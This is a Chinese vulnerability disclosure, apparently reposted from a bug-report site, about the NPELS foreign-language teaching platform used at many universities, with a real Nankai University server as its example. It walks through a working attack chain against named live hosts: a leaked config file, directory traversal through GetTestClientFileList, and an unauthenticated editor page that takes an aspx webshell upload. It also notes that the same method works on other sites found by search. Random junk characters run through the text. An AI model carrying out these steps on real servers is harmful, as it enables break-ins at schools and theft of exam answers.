好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
- F9 ]! S5 _" T$ c7 @) h9 r6 \* N
详细说明:
9 R5 V5 z# A5 s5 G. x0 b( H 7 t7 L ~* u% Z
以南开大学的为例: : L1 |! }5 q4 N% M/ [, `2 ]7 p
http://222.30.60.3/NPELS9 ~( i; h1 Z6 H! }* p7 {
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
% w5 N3 R5 b8 ?1 \7 l' p5 p<setting name="Update_CommonSvr_CommonService" serializeAs="String">
, _& ^ Z1 y+ T: B<value>http://222.30.60.3/NPELS/CommonService.asmx</value>0 F5 }* S) F3 V3 w# O
</setting>5 X7 j1 Q# `3 x! E; P& m+ j
及版本号
: O. e1 ^* |: U<add key="TVersion" value="1, 0, 0, 2187">7 f' x+ I2 [+ I( _2 ]3 a$ `, \
</add>
u* Q. n# ?$ K6 H6 e6 e! `' M* O直接访问
& M1 h, l% @. r2 Ahttp://222.30.60.3/NPELS/CommonService.asmx
; U/ B- W' d! E使用GetTestClientFileList操作,直接 HTTP GET 列目录:
( V! C. S! ]& A3 }4 J+ Thttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21879 ^& h) k u# n# L! J
进一步列目录(返回的网页很大,可以直接 wget 下来)$ t; H0 y* e+ v4 |& K7 U9 @
http://222.30.60.3/NPELS/CommonS ... List?version=../../
: h* o2 Y2 d$ o5 L0 \9 P ( Y; _& s: `0 T o: u. }
发现- ], @* z. V6 H4 {5 b% e* H" }. C
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm4 ^, m& h, j: w+ }
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头5 I$ I! T8 c7 c9 E
上传后继续列目录找到木马地址直接访问即可 v- E/ ~! @7 d4 c( R
; ~! E6 I0 [& t. z2 s- IOOXX: \; N9 _, F/ n2 y {6 c7 Z7 k d
) ~" m3 `' u9 ?: v; z& aGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
' M Q( W6 Y% V% x, l2 e漏洞证明:
+ T! N9 f) m7 L/ a3 Q9 @
; E3 \5 L2 d) J. l- D列目录:/ ^, I+ R' y: [+ W+ L! x
http://222.30.60.3/NPELS/CommonS ... List?version=../../& L" ?/ v& ]: ]6 x
文件上传:
+ i& K$ g! n9 V3 |% B6 whttp://222.30.60.3/npelsv/editor/editor.htm
9 ]! s3 h# Q8 t5 e
) K+ j8 M5 ~+ e9 j上传木马:
2 O. q- U4 I) d2 x: P thttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
" |+ Z2 K% P( ^1 y% z* L8 {
7 ]0 m/ ?0 e8 Q* ^9 K4 Q. \修复方案:
3 n2 O: a, {' b8 \& r好像考试系统必须使用 CommonService.asmx) A# c( x( a2 U+ P j+ [
最好配置文件加密或者用别的方式不让它泄露出来
! Z) K% @. @: f. ]+ ^并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样' B( ?2 C0 g% B3 `) `
|